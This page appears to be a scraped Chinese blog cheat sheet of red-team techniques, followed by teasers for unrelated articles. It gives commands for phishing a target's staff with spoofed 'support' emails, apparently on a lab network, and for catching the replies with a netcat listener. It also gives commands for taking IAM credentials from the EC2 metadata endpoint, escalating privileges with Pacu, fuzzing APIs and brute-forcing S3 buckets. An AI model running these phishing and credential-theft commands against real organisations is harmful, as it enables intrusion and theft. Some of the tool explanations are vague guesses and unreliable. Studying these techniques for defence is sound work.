news 2026/4/16 17:46:45

小白也能看懂系列——红队进攻

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
小白也能看懂系列——红队进攻

红队 - 攻击SMTP

  1. 信息收集 |Techniques: Nmap Scanning
nmap -sV -sC -v -p- --min-rate=10000<Target IP>
  1. 子域枚举 |Techniques: Using ffuf for subdomain Brute-Forcing
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H"Host: FUZZ.TargetDomain.com"
  1. 电子邮件收集 |Techniques: Extracting Email from Web Page
#Manually visit Target Domain / SubDomain and extract emails to mails.txt
  1. 电子邮件互动 |Techniques: Sending Emails with swaks
whilereadmail;doswaks --to$mail--from support@TargetDomain.com --header"Subject: Credentials"--body"goto http://10.10.14.4"--server 10.10.10.197;done<mails.txt
  1. 凭证收获 |Techniques: Netcat Listener
nc -lvp 80#to listen for incoming connections
  1. 访问SMTP |Techniques: Using evolution to Access SMTP
apt install evolution#and with Configure SMTP server 10.10.10.197 and email user@TargetDomain.com
  1. 探索已发送物品 |Techniques: Checking Sent Emails
#Check sent items for any useful information afther accessing the SMTP server

通过EC2元数据进行权限升级

方法一

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>
  • curl: 用于执行HTTP请求的命令行工具。
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>:元数据服务的URL端点,用于获取指定IAM角色的安全凭证。用IAM职位的名称替换<role_name>。

方法二

python3 pacu.py --method escalate_iam_roles --profile<aws_profile>--regions<aws_region>--instances<instance_id>
  • 在此命令中,pacu.py 脚本与该方法一起执行,该方法专门设计用于提升与 IAM 角色相关的权限。escalate_iam_roles
  • --profile选项指定用于认证的 AWS 配置文件。
  • --regions选项指定了要针对的AWS区域。
  • --instances选项用于指定将要升级IAM角色的目标EC2实例ID。

不安全的接口和API(面向云端)

方法一

python3 cloudhunter.py --write-test --open-only http://example.com
  • --write-test: 该选项告诉脚本写入测试文件。测试文件的目的和内容取决于 cloudhunter.py 脚本的实现方式。
  • --open-only:该选项指定脚本仅检查目标URL上的开放端口或服务,此时目标URL为 http://example.com。它表示脚本不会尝试执行任何其他类型的扫描或分析。
  • http://example.com: 这是脚本将对其进行开放端口检查的目标URL。在这个例子中,它被设置为 http://example.com,但在实际场景中,你通常会用你想测试的实际URL替换它。

方法二

cf enum<domain>
  • 通过用实际域名替换,命令会尝试使用 cf 枚举工具检索该域名的特定信息。收集的信息类型及呈现方式取决于所用工具的具体实现方式。<domain>

方法三

ffuf -w /path/to/seclists/Discovery/Web-Content/api.txt -u https://example.com/FUZZ -mc all
  • ffuf: 这是执行的工具或命令名称。
  • -w /path/to/seclists/Discovery/Web-Content/api.txt: 该选项指定用于模糊的单词表(-w)。wordlist 文件位于 /path/to/seclists/Discovery/Web-Content/api.txt,包含将针对目标 URL 进行测试的潜在输入值或负载列表。
  • -u https://example.com/FUZZ:该选项定义了模糊过程的目标URL(-u)。字符串 FUZZ 作为占位符,在模糊过程中会被单词列表中的值替换。此时目标URL为 https://example.com/FUZZ,FUZZ将被替换为单词列表中不同的负载。
  • -mc all: 该选项指定目标服务器响应的匹配条件(-mc)。在这种情况下,所有响应,无论 HTTP 状态码如何,都将被视为有效匹配。

方法4

php s3-buckets-bruteforcer.php --bucket gwen001-test002
  • 通过提供参数后加上特定值(gwen001-test002),脚本将尝试以该值为目标对亚马逊S3桶进行暴力破解。脚本很可能包含了遍历不同桶名称的逻辑,尝试每个,直到找到有效或可访问的桶。--bucket
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 13:34:02

基于 Spring AI 与 Streamable HTTP 构建 MCP Server 实践

基于 Spring AI 与 Streamable HTTP 构建 MCP Server 实践面向专家读者的实战文章&#xff0c;目标是把“模型驱动工具调用&#xff08;MCP&#xff09;”从协议、架构到工程落地完整走通。本文强调可扩展、可观测与生产级交付。1. 背景与目标 随着模型能力增强&#xff0c;单纯…

作者头像 李华
网站建设 2026/4/16 12:00:55

PGA+MKAN+Timexer时间序列预测模型Pytorch架构

本模型集成PGA、MKAN与TimeXer三大前沿组件&#xff0c;构建了一套完整且创新的时间序列预测框架&#xff0c;基于PyTorch架构实现并提供Python代码。该框架融合了优化算法、卷积特征提取与Transformer架构的精髓&#xff0c;具备以下核心特点&#xff1a; &#x1f525; 模型核…

作者头像 李华
网站建设 2026/4/16 12:00:22

即插即用系列(代码实践)| CVPR 2025 EfficientViM:基于“隐状态混合SSD”与“多阶段融合”的轻量级视觉 Mamba 新标杆

论文题目:Efficient Vision Mamba with Hidden State Mixer based State Space Duality 中文题目:基于隐藏状态混合器SSD的高效视觉Mamba 应用任务:轻量级主干网络、移动端部署、实时语义分割/检测 摘要: 本文提取自 2024/2025年最新论文《Efficient Vision Mamba with Hid…

作者头像 李华
网站建设 2026/4/16 15:06:06

接口自动化的关键思路和解决方案,本文全讲清楚了

与UI相比&#xff0c;接口一旦研发完成&#xff0c;通常变更或重构的频率和幅度相对较小。因此做接口自动化的性价比更高&#xff0c;通常运用于迭代版本上线前的回归测试中。 手工做接口测试&#xff0c;测试数据和参数都可以由测试人员手动填写和更新。 因此我们在考虑将接…

作者头像 李华
网站建设 2026/4/16 13:29:43

【接口测试】工具篇Postman

本文大纲截图&#xff1a; 一、Postman简介和安装【看到最后有...】 简介&#xff1a; Postman 是一款非常流行的接口调试工具&#xff0c;它使用简单&#xff0c;而且功能也很强大。不仅测试人员会使用&#xff0c;开发人员也经常使用。 特征&#xff1a; 1&#xff09;简单易…

作者头像 李华
网站建设 2026/4/16 15:05:17

软件测试面试?太简单了 2026测试面经 (答案+思路+史上最全)

从年后开始投简历面试的&#xff0c;在boss和拉钩上投了有几十份简历&#xff0c;其中70%未读状态&#xff0c;30%已读&#xff0c;已读的一半回复要求发送附件简历&#xff0c;然后这周接到面试的有七、八家公司&#xff0c;所以&#xff0c;当前这个大环境真的难 这半个月来…

作者头像 李华